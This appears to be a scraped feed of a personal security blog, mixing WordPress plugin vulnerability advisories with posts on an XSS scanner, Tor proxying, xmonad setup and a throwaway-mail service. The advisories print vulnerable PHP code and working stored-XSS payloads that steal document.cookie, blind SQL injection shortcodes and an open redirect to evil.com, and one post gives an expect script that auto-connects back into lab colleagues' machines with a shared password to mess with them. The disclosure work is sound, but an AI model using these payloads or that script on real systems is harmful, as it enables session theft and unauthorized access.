'forum_use_seo_friendly_urls' => $_POST['forum_use_seo_friendly_urls'],
'forum_allow_image_uploads' => $_POST['forum_allow_image_uploads'],
'notify_admin_on_new_posts' => $_POST['notify_admin_on_new_posts'],
'set_sort' => $op['set_sort'],
'forum_use_spam' => $_POST['forum_use_spam'],
'forum_use_bbcode' => $_POST['forum_use_bbcode'],
'forum_captcha' => $_POST['forum_captcha'],
'hot_topic' => $_POST['hot_topic'],
'veryhot_topic' => $_POST['veryhot_topic'],
'forum_display_name' => $_POST['forum_display_name'],
'level_one' => $_POST['level_one'],
'level_two' => $_POST['level_two'],
'level_three' => $_POST['level_three'],
'level_newb_name' => $_POST['level_newb_name'],
'level_one_name' => $_POST['level_one_name'],
'level_two_name' => $_POST['level_two_name'],
'level_three_name' => $_POST['level_three_name'],
'forum_db_version' => $op['forum_db_version'],
'forum_disabled_cats' => explode(",",$_POST['forum_disabled_cats'])
admin.php?page=mfstructure
When adding a new forum both the name and description fields are not sanitized, so a stored xss payload in the admin interface AND forum pages is possible. They are escaped only against sqli, except for add_forum_group_id which is exploitable.
Vulnerable code:
$add_forum_description = $wpdb->escape($_POST['add_forum_description']);
$add_forum_name = $wpdb->escape($_POST['add_forum_name']);
$add_forum_group_id = $_POST['add_forum_group_id'];
---
$wpdb->query("INSERT INTO ".$table_prefix."forum_forums (name, description, parent_id, sort)
VALUES('$add_forum_name', '$add_forum_description', '$add_forum_group_id', '$max')");
admin.php?page=mfads
Every textarea input is not sanitized and can lead to stored xss payloads in the admin interface and forum pages (this is somewhat intended behavior since HTML is allowed, but still…) i.e.: “>[XSS]
Vulnerable code:
'mf_ad_above_forum_on' => $_POST['mf_ad_above_forum_on'],
'mf_ad_above_forum' => $_POST['mf_ad_above_forum_text'],
'mf_ad_below_forum_on' => $_POST['mf_ad_below_forum_on'],
'mf_ad_below_forum' => $_POST['mf_ad_below_forum_text'],
'mf_ad_above_branding_on' => $_POST['mf_ad_above_branding_on'],
'mf_ad_above_branding' => $_POST['mf_ad_above_branding_text'],
'mf_ad_above_info_center_on' => $_POST['mf_ad_above_info_center_on'],
'mf_ad_above_info_center' => $_POST['mf_ad_above_info_center_text'],
'mf_ad_above_quick_reply_on' => $_POST['mf_ad_above_quick_reply_on'],
'mf_ad_above_quick_reply' => $_POST['mf_ad_above_quick_reply_text'],
'mf_ad_above_breadcrumbs_on' => $_POST['mf_ad_above_breadcrumbs_on'],
'mf_ad_above_breadcrumbs' => $_POST['mf_ad_above_breadcrumbs_text'],
'mf_ad_below_first_post_on' => $_POST['mf_ad_below_first_post_on'],
'mf_ad_below_first_post' => $_POST['mf_ad_below_first_post_text'],
'mf_ad_custom_css' => $_POST['mf_ad_custom_css']
# Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01
You need permissions to write a post (HTML mode) to exploit the shortcode:
[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']
]]># Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09
You need permissions to publish a post from the public interface: the submission form is not well sanitized and will result in stored xss in admin pages:
The Name field is not sanitized and is injectable with a payload which will be stored in the pending submissions page in the admin panel. POC: myname’"><script>window.alert(document.cookie)</script>
The Email field is not sanitized, but it will be checked for a valid email address so the maximum result will be a reflected xss. POC: [email protected]’"><script>window.alert(document.cookie)</script>
The Post Title is not sanitized and is injectable with a payload which will be stored in the pending submissions page in the admin panel. POC: title’"><script>window.alert(document.cookie)</script>
# Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4
Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
The rendered page will provide a link to http://www.evil.com
Via POST: http://server/wp-content/plugins/age-verification/age-verification.php
redirect_to: http://www.evil.com
age_day: 1
age_month: 1
age_year: 1970
Direct redirect to http://www.evil.com
# Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi ([email protected] @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1
The shortcode parameter ‘id’ is prone to blind sqli; you need to be able to write a post/page to exploit this:
[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]
http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php
After connecting to twitter:
?link=&22></input>[XSS]
After submitting the tweet:
?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]
The final download link will be replaced with [REDIRECT-TO-URL]
POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"<script>alert(document.cookie)</script>
It’s written in python and it’s obviously coded on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg since I was already familiar with it.
At the time of this writing it’s capable of setting soft, hard and memory breakpoints, it has a minimal interactive shell to retrieve register status and it’s expandable with custom callbacks for handling exceptions.
Building a debugger has been an awesome experience (except for the parts where I am swearing at the IA32 Intel docs) and I really learned a lot - and this was the main goal.
Since I am starting to get my feet wet in reverse engineering I am looking to eat my own dogfood and use it to analyze some samples from my malware collection. This way I hope to keep it updated and maybe add some new features too.
As usual everything is GPLd and you can find it on my bitbucket page.
]]>$ python xsssniper.py --url 'X' --payload 'Y' --check 'Z'
What it does is scan the target URL for GET parameters, then inject an XSS payload (Y) into them and parse the response for artefacts of the injection (Z).
The simplest example would be to inject
<script type="text/javascript">window.alert('lol')</script> and check for
<script type="text/javascript">window.alert('lol')</script>, if we have a match maybe we have
just found an XSS.
If no check is specified xsssniper will consider payload and check the same.
If no payload is specified either, a special file will be parsed for common
payloads (lib/payloads.xml, feel free to contribute!).
Another useful feature is the ability to crawl the target URL for relative links. Every link found is added to the scan queue and processed, so it’s easier to test an entire website.
In the end this method is not foolproof, but it’s a good heuristic to mass-find injection points and test escape strategies. Also, since there is no browser emulation, it’s your duty to manually test discovered injections against the various browsers’ xss protections.
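The per-parameter injection step can be sketched like this (illustrative Python, not xsssniper’s code; note that urlencode will percent-encode the payload, which a real scanner has to account for):

```python
from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse

def inject_into_params(url, payload):
    """Yield one URL per GET parameter, with the payload substituted in.
    A scanner would fetch each and look for the payload (or check string)
    reflected in the response body."""
    parts = urlparse(url)
    params = parse_qsl(parts.query)
    for i in range(len(params)):
        tainted = list(params)
        tainted[i] = (tainted[i][0], payload)
        yield urlunparse(parts._replace(query=urlencode(tainted)))
```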
Here is the usage:
Usage: xsssniper.py [options]
Options:
-h, --help show this help message and exit
-u URL, --url=URL target URL
-p PAYLOAD, --payload=PAYLOAD
payload to inject. If the payload is not
specified standard payloads from lib/payloads.xml
will be used
-c CHECK, --check=CHECK
payload artefact to search in response
--threads=THREADS number of threads
--http-proxy=HTTP_PROXY
scan behind given proxy (format: 127.0.0.1:80)
--tor scan behind default Tor
--crawl crawl target url for other links to test
Its development is still active and I am adding features day after day.
For any suggestion feel free to contact me (mail or twitter) meanwhile check out the repository.
]]>For simplicity I’ve installed from packages. As root:
$ pkg_add tor
$ pkg_add polipo
Next we need to configure Polipo to use Tor and we can take advantage of the sample config file provided by Tor itself:
$ cd /etc/polipo
$ mv config config.old
$ wget http://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
$ mv polipo.conf config
The part worth noticing is this (9050 is Tor default port):
# /etc/polipo/config
socksParentProxy = "localhost:9050"
socksProxyType = socks5
Let’s tune the config a little. I want Polipo to run as a daemon and log (/var/log/polipo) so I’ve added:
# Run as daemon
daemonise = true
logSyslog = true
And I’d like Tor to run as a daemon too. Open the Tor config (/etc/tor/torrc) and uncomment/add:
RunAsDaemon 1
For other options you can man polipo and man tor. Note that I didn’t touch the standard ports but you can easily change them from the respective configs.
Now let’s make them run at startup by editing /etc/rc.local and adding:
# Start Tor
if [ -x /usr/local/bin/tor ]; then
echo -n ' tor'
/usr/local/bin/tor
fi
# Start Polipo
if [ -x /usr/local/bin/polipo ]; then
echo -n ' polipo'
/usr/local/bin/polipo
fi
The last step is to set up the HTTP_PROXY environment variable of your shell. This var is used by most applications to connect through a proxy. Open your shell config (like ~/.bashrc) and add:
# Proxy!
http_proxy=http://127.0.0.1:8118/
HTTP_PROXY=$http_proxy
export http_proxy HTTP_PROXY
Some applications use all lower case, some all upper case, so we specify both to be safe.
Now to test you can reboot or just start everything by hand (in this case be sure to export HTTP_PROXY):
$ tor
$ polipo
$ curl ip.appspot.com
Please note that not every application understands and uses HTTP_PROXY; for better security have a look at torsocks and the Tor wiki.
If you need to connect to known domains without passing through the tor proxy (like localhost), setting up the NO_PROXY environment variable might help:
$ export no_proxy="localhost"
$ export NO_PROXY="localhost"
Then check if the vars have been correctly set:
$ env
Check your shell manual pages for further reference.
]]>You can find it on my bitbucket.
Usage:
$ pastebin.py -f python -e 10M -p 1 -t MyPaste < whatever
Practically, you just pipe your data to the script.
Here are some options:
-f defines data format (php, python, etc)
-e the expiry time (10M, 1G, 1D, N)
-p the privacy (1 is private, 0 is public)
-t the title of the paste
The script looks for a config file in your home dir with your dev API key and optionally a username and a valid password (without valid login credentials your pastes will be anonymous).
The first time you run it, it will create the config (~/.pastebin).
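The config handling described above might look roughly like this (key names and file layout are my assumptions, not the script’s actual format):

```python
import os
import configparser

CONFIG_PATH = os.path.expanduser('~/.pastebin')

def load_config(path=CONFIG_PATH):
    """Create a skeleton config on first run, then return the stored values."""
    config = configparser.ConfigParser()
    if not os.path.exists(path):
        # First run: write an empty skeleton for the user to fill in
        config['pastebin'] = {'api_dev_key': '', 'username': '', 'password': ''}
        with open(path, 'w') as f:
            config.write(f)
    config.read(path)
    return dict(config['pastebin'])
```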
Feel free to fork/edit/whatever it.
]]>The first thing to do (if you haven’t yet) is installing the Haskell platform. I use Homebrew as my package manager of choice:
brew install haskell-platform
Next we are going to install xmonad from Cabal:
cabal update
cabal install xmonad
Now that everything is installed correctly we need to tweak our X11.app settings in order to run nicely with xmonad.
First open your .bash_profile and append the following, as nicely described here:
# Xmonad stuff
export PATH=/Users/gbrindisi/.cabal/bin:$PATH
export USERWM=`which xmonad`
Next we need an .xinitrc in our $HOME, and we can copy from the stock
one:
cp /usr/X11/lib/X11/xinit/xinitrc ~/.xinitrc
Some editing is needed because this .xinitrc executes quartz-wm by default, and xmonad will throw an error if you try to start it on top of another window manager.
So open it and locate this if statement and comment/remove everything:
if [ -d /usr/X11/lib/X11/xinit/xinitrc.d ] ; then
for f in /usr/X11/lib/X11/xinit/xinitrc.d/*.sh ; do
[ -x "$f" ] && . "$f"
done
unset f
fi
The above statement simply executes every *.sh in X11’s xinitrc.d directory.
One of those is quartz-wm, which you don’t want to run, but if you need the others feel free to execute them anyway – I haven’t looked at them in depth.
I’ve also removed the following lines:
twm &;
xclock -geometry 50x50-1+1 &;
xterm -geometry 80x50+494+51 &;
xterm -geometry 80x20+494-0 &;
exec xterm -geometry 80x66+0+0 -name login
Then you need to append a couple of commands:
source ~/.bash_profile
exec $USERWM
Now everything should be set up correctly.
The next and final step is to remap our X11 key bindings: since Command is xmonad’s default meta key, it will happily interfere with other OSX applications.
Create a new .Xmodmap and write:
clear Mod1
clear Mod2
keycode 63 = Mode_switch
keycode 66 = Meta_L
add Mod1 = Meta_L
add Mod2 = Mode_switch
And we are set. (Note: 63 is the left Option key and 66 is the left Command key)
Now run X11.app and enjoy xmonad.
]]>It’s a disposable temporary email service. Its main goal is to help you dodge spam by providing a valid throw-away mail address you can use instead of your real one. For example when you want to leave a comment on a shady blog, register to a random forum or whatever else.
When prompted for a valid mail simply use [email protected]
then go to Pepbot and check your mail or forget about it.
But there is more: the auto-mode!
Many web services need to verify that the email address you provide is a valid one before confirming your account.
To do so they will send a verification link you should click. So ideally you need to check your mail, wait for the verification, click the link and then finally get a valid account.
Here comes the awesomeness: use a special mailbox with the -a tag
like [email protected] and Pepbot will click on every link from
every mail it receives for you!
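The auto-mode boils down to scraping every link out of an incoming mail and fetching it; the extraction half could be as simple as this (illustrative, not Pepbot’s actual code — the fetching is omitted):

```python
import re

# Rough URL matcher: stop at whitespace, quotes and angle brackets so it
# also works on links embedded in HTML mail bodies
LINK_RE = re.compile(r'https?://[^\s<>"\']+')

def extract_links(mail_body):
    """Pull every http(s) URL out of a mail body -- what the -a mode
    would then fetch one by one to trigger verification links."""
    return LINK_RE.findall(mail_body)
```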
I am learning python so I thought it would be fun to start coding something useful (at least for me), plus I needed something to help me sharpen my sys admin skills.
So far it worked: I’ve coded, I’ve hardened a VPS, I’ve deployed an app (oh man it was painful!)… I learned a lot throughout the whole process. And I had fun. Epic win.
Pepbot is built on top of Lamson and… Memcached.
Long story short: whenever a mail arrives Lamson reads it, performs some tasks, and puts it into a local Memcached server. The frontend (which is written with bottle.py) retrieves the emails from the Memcached server whenever a user asks to check a mailbox.
Why Memcached and not some other well-established database? Because I thought (actually I did the math) that writing to disk would be a performance bottleneck. I wanted something that could scale well and fast against a large volume of stored mails, and since ideally the majority of mails will be totally useless (spam! nom nom nom), why bother?
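The storage layer described above could be sketched like this (key scheme and TTL are my assumptions, not Pepbot’s actual code) — with an expiry set on each key, abandoned mailboxes clean themselves up for free:

```python
import json

MAIL_TTL = 3600  # hypothetical: keep mails around for an hour

def store_mail(mc, mailbox, mail):
    """Append a mail to a mailbox's list, kept under one memcached key.
    `mc` is any client with memcached-style get/set."""
    key = 'mailbox:' + mailbox
    mails = json.loads(mc.get(key) or '[]')
    mails.append(mail)
    mc.set(key, json.dumps(mails), MAIL_TTL)

def read_mailbox(mc, mailbox):
    """Return every stored mail for a mailbox (empty if expired/unknown)."""
    return json.loads(mc.get('mailbox:' + mailbox) or '[]')
```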
Nothing. Go and play with my baby.
Remember that it is in public beta, so if you find a bug please let me know!
And if you have suggestions and/or a feature request don’t be shy and contact me.
]]>#!/usr/bin/expect
spawn ssh user@host whatever
expect "*?assword:*"
send -- "password\r"
send -- "\r"
I used it with dynamic SSH connection detection in .profile.
In the lab I am using, every machine has the same unprivileged user authenticated with the same password. And SSH is open.
You can guess the popular game: connect to random machines and mess things up while someone is working on them.
In .profile I’ve added a simple check and a call to the expect script to automatically connect to whoever sshes into my machine (and shut down their computer, or open random porn, you decide):
if [ "$SSH_CONNECTION" ] ; then
./release_the_dogs.exp
fi
The victim ip is easily obtained by ${SSH_CONNECTION%* * * *}.
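SSH_CONNECTION packs four space-separated fields (client ip, client port, server ip, server port), so the parameter expansion above just strips everything after the first space; the same extraction in Python:

```python
def client_ip(ssh_connection):
    """SSH_CONNECTION is 'client_ip client_port server_ip server_port';
    the attacker-of-opportunity only needs the first field."""
    return ssh_connection.split()[0]
```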
The fix:
Remount the / file system in read and write mode with mount -u / and then mount -a
Run passwd
exit
Pheww.
I needed to save this tip somewhere because I know I will forget root password again.
]]>I am a security engineer specialized in cloud & AI security, currently working at Synthesia wrestling with the security challenges of AI.
Previously I was the product security lead engineer for Docker’s Trust and AI groups. Before that I spent much of my career at Spotify, joining during their transition to Google Cloud Platform (GCP), contributing to scaling the security organization and eventually leading the cloud security team. Along the way I contributed to open source projects, wrote articles and spoke at events.
Once upon a time, I worked as a consultant in the financial sector running security assessments and developing cyber fraud mitigations.
Cloudberry Engineering is my place to learn and note down thoughts around security.
Opinions are my own.
]]>